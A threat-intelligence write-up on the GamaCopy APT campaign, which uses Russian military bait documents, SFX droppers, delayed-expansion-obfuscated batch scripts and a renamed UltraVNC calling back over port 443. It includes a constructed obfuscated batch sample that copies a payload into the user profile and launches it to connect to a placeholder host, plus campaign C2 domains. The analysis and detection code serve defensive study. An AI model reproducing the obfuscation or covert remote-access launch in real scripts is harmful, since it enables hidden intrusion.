Cybersecurity researchers have recently uncovered a series of targeted attacks that use military-related content as bait to compromise Russian-speaking victims.
These findings shed light on a sophisticated campaign orchestrated by the GamaCopy APT group, an organization known for mirroring the tactics, techniques, and procedures (TTPs) of Gamaredon, a group primarily focused on attacking Ukrainian entities.
Through detailed analysis, researchers have established significant technical differences between Gamaredon and GamaCopy, attributing the observed attack activity to the latter.
The operation begins with the use of bait documents detailing Russian military facilities.

The delivery vehicle is a 7z self-extracting (SFX) archive; when the victim executes it, the archive drops a series of payloads.
These payloads include obfuscated batch scripts that copy and execute specific files, among them a renamed copy of the open-source remote desktop tool UltraVNC.
The UltraVNC binary runs under a legitimate-sounding process name and connects to a predefined command-and-control (C2) server over port 443, so that at the port level its traffic looks like ordinary HTTPS and is less likely to be flagged.
The batch scripts are obfuscated with cmd.exe delayed variable expansion (the !var! syntax enabled by setlocal EnableDelayedExpansion), so the commands actually run are assembled from variables at execution time rather than appearing as literal strings, which defeats simple string matching and complicates static analysis.
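To show what delayed variable expansion does to a script and how an analyst unwinds it, here is an added example written for this page (not code from the report or from the campaign): a small Python evaluator for the subset of cmd.exe syntax involved, run over a constructed batch fragment. The variable names, file names, the host example.invalid and the UltraVNC command-line flag are placeholders, and the evaluator does not handle immediate %var% expansion, set /a, call or for loops, which real samples may also use.

```python
import re

# Matches "set name=value" and the quoted form set "name=value"; the optional
# closing quote is consumed outside the capture group.
SET_RE = re.compile(r'^\s*set\s+"?([^=" ]+)=(.*?)"?\s*$', re.IGNORECASE)

# Matches a delayed-expansion reference: !name!, !name:~start! or !name:~start,len!
REF_RE = re.compile(r'!([A-Za-z_][A-Za-z0-9_]*)(?::~(-?\d+)(?:,(-?\d+))?)?!')

# Lines that set up the environment but run nothing; skipped by the evaluator.
SKIP_PREFIXES = ("@echo off", "setlocal", "endlocal", "rem ", "::")

# Constructed sample in the style described above (not a file from the
# campaign). The letters of "copy" and "start" are scattered in one variable
# and reassembled at run time; host, -connect flag and file names are placeholders.
SAMPLE_SCRIPT = r'''
@echo off
setlocal EnableDelayedExpansion
set "a=rscaptyo"
set "c=!a:~2,1!!a:~7,1!!a:~4,1!!a:~6,1!"
set "s=!a:~1,1!!a:~5,1!!a:~3,1!!a:~0,1!!a:~5,1!"
set "dst=%APPDATA%\explorer_svc.exe"
!c! "%~dp0data.bin" "!dst!"
!s! "" "!dst!" -connect example.invalid:443
'''


def cmd_substring(value, start, length=None):
    """Apply cmd.exe %var:~start,len% semantics: a negative start counts from
    the end, a negative len drops that many characters from the end."""
    n = len(value)
    if start < 0:
        start = max(n + start, 0)
    if start >= n:
        return ""
    if length is None:
        end = n
    elif length < 0:
        end = n + length
    else:
        end = start + length
    return value[start:end] if end > start else ""


def expand_line(line, env):
    """Resolve every !var! / !var:~s,l! reference against the variables seen so far.
    Percent references such as %APPDATA% are deliberately left untouched."""
    def repl(match):
        name, start, length = match.groups()
        value = env.get(name.lower(), "")
        if start is None:
            return value
        return cmd_substring(value, int(start), None if length is None else int(length))
    return REF_RE.sub(repl, line)


def deobfuscate(script):
    """Walk the script once, recording set assignments and returning the
    remaining lines with all delayed-expansion references resolved."""
    env = {}
    resolved = []
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.lower().startswith(SKIP_PREFIXES):
            continue
        assignment = SET_RE.match(line)
        if assignment:
            name, value = assignment.groups()
            env[name.lower()] = expand_line(value, env)  # values may themselves use !refs!
            continue
        resolved.append(expand_line(line, env))
    return resolved


def literal_present(text, word):
    """Plain substring search, the check this obfuscation is designed to defeat."""
    return word in text


if __name__ == "__main__":
    for cmd in deobfuscate(SAMPLE_SCRIPT):
        print(cmd)
```

Grepping the raw script for "copy" or "start" finds nothing, while the resolved output shows the copy of the dropped file into the profile directory and the start of the renamed binary with its connect argument; that gap is exactly why a sandbox trace or an evaluator like this one belongs in the triage of SFX-dropped batch files.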
Attribution to GamaCopy and Its False-Flag Strategies
While Gamaredon has historically employed SFX and UltraVNC in its campaigns, close examination of the current attack chain reveals significant deviations.
For example, Gamaredon typically uses macros or VBS scripts to deliver its follow-on payloads, and its UltraVNC deployments usually connect over port 5612.
By contrast, the GamaCopy group deploys UltraVNC via SFX archives, connects over port 443, and consistently uses Russian-language bait documents aimed at targets such as Russia's Ministry of Foreign Affairs and defense-related organizations.
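A hunting check over process-creation and network-connection telemetry, as an added example written for this page rather than code from the report: the OriginalFileName stored in a PE's version resource survives a rename on disk, so comparing it with the running image name catches a renamed UltraVNC, and correlating that process with outbound connections on 443 (this campaign) or 5612 (the Gamaredon pattern described above) surfaces the C2 side. The Sysmon-style events are constructed, and the assumption that UltraVNC's binaries carry winvnc.exe and vncviewer.exe as their original file names should be verified against your own copy of the tool.

```python
from collections import defaultdict
from pathlib import PureWindowsPath

# Original file names assumed for UltraVNC's PE version resources (an assumption
# for this example; confirm against a known-good copy of the installer).
VNC_ORIGINAL_NAMES = {"winvnc.exe", "vncviewer.exe"}

# Ports worth correlating: 443 per the reporting on this campaign, and 5612,
# the port the write-up attributes to Gamaredon's UltraVNC activity.
SUSPECT_PORTS = {443, 5612}

# Constructed Sysmon-style events (not real telemetry): EventID 1 is process
# creation, EventID 3 is a network connection, joined on ProcessGuid.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessGuid": "{A1}", "Image": r"C:\Users\u\AppData\Roaming\explorer_svc.exe",
     "OriginalFileName": "winvnc.exe",
     "CommandLine": r"explorer_svc.exe -connect example.invalid:443"},
    {"EventID": 3, "ProcessGuid": "{A1}", "Image": r"C:\Users\u\AppData\Roaming\explorer_svc.exe",
     "DestinationHostname": "example.invalid", "DestinationPort": 443},
    # A legitimately installed VNC server: original name matches, standard port.
    {"EventID": 1, "ProcessGuid": "{B2}", "Image": r"C:\Program Files\uvnc\winvnc.exe",
     "OriginalFileName": "winvnc.exe", "CommandLine": "winvnc.exe -service"},
    {"EventID": 3, "ProcessGuid": "{B2}", "Image": r"C:\Program Files\uvnc\winvnc.exe",
     "DestinationHostname": "10.0.0.5", "DestinationPort": 5900},
    # A browser talking HTTPS: port 443 alone is not suspicious.
    {"EventID": 1, "ProcessGuid": "{C3}", "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "OriginalFileName": "firefox.exe", "CommandLine": "firefox.exe"},
    {"EventID": 3, "ProcessGuid": "{C3}", "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationHostname": "example.org", "DestinationPort": 443},
]


def is_renamed_vnc(event):
    """True when a process-creation event carries a VNC OriginalFileName
    but runs under a different image name."""
    original = event.get("OriginalFileName", "").lower()
    image_name = PureWindowsPath(event["Image"]).name.lower()
    return original in VNC_ORIGINAL_NAMES and image_name != original


def hunt(events):
    """Return one finding per renamed VNC process, with any outbound
    connections on the suspect ports attached as C2 candidates."""
    by_guid = defaultdict(list)
    for ev in events:
        by_guid[ev["ProcessGuid"]].append(ev)

    findings = []
    for guid, evs in by_guid.items():
        creates = [e for e in evs if e["EventID"] == 1]
        if not creates or not is_renamed_vnc(creates[0]):
            continue
        conns = [(e["DestinationHostname"], e["DestinationPort"])
                 for e in evs
                 if e["EventID"] == 3 and e["DestinationPort"] in SUSPECT_PORTS]
        findings.append({
            "guid": guid,
            "image": creates[0]["Image"],
            "original": creates[0]["OriginalFileName"],
            "command_line": creates[0].get("CommandLine", ""),
            "c2_candidates": conns,
        })
    return findings


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

The rename check is the high-signal part; the port is only context, since a legitimate VNC server on 5900 and a browser on 443 both pass through untouched. An actor that also rewrites the version resource will slip past this, so pair it with import-hash or code-signing checks on anything that starts from a user-writable directory.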

The use of Russian-language bait documents, as opposed to Gamaredon’s tendency to use Ukrainian-language content, reinforces the attribution to GamaCopy.
This group, first identified in June 2023, is believed to have been active since 2021, regularly mimicking Gamaredon’s TTPs to sow confusion and mount false-flag operations.
By leveraging open-source tools like UltraVNC and crafting complex attack chains, GamaCopy seeks to obscure its origins and exploit the geopolitical “fog of war” in the ongoing Russia-Ukraine conflict.
Context and Strategic Implications
The GamaCopy campaign highlights a concerning trend in cyber warfare, where adversaries use publicly available tools and mimic the tactics of established threat groups to evade attribution.
With its apparent focus on targeting Russian defense and critical infrastructure sectors, GamaCopy has emerged as a notable actor in the cyber domain.
Its combination of false-flag tradecraft, deliberate language choices in its lures, and evasion techniques such as renamed tooling and C2 over port 443 illustrates the complexity of modern APT campaigns.
The analysis identified several file hashes and C2 servers associated with the campaign.
SHA-256 hashes:
c9ffc90487ddcb4bb0540ea4e2a1ce040740371bb0f3ad70e36824d486058349
2da473d1f510d0ddbae074a6c13953863c25be479acedc899c5529ec55bd2a65
C2 servers, contacted over port 443 for communication between infected systems and the attackers:
nefteparkstroy.ru:443
fmsru.ru:443
This discovery underscores the importance of diligent threat-hunting efforts and in-depth analyses to detect and neutralize cyber campaigns designed to hide under layers of deception and mimicry.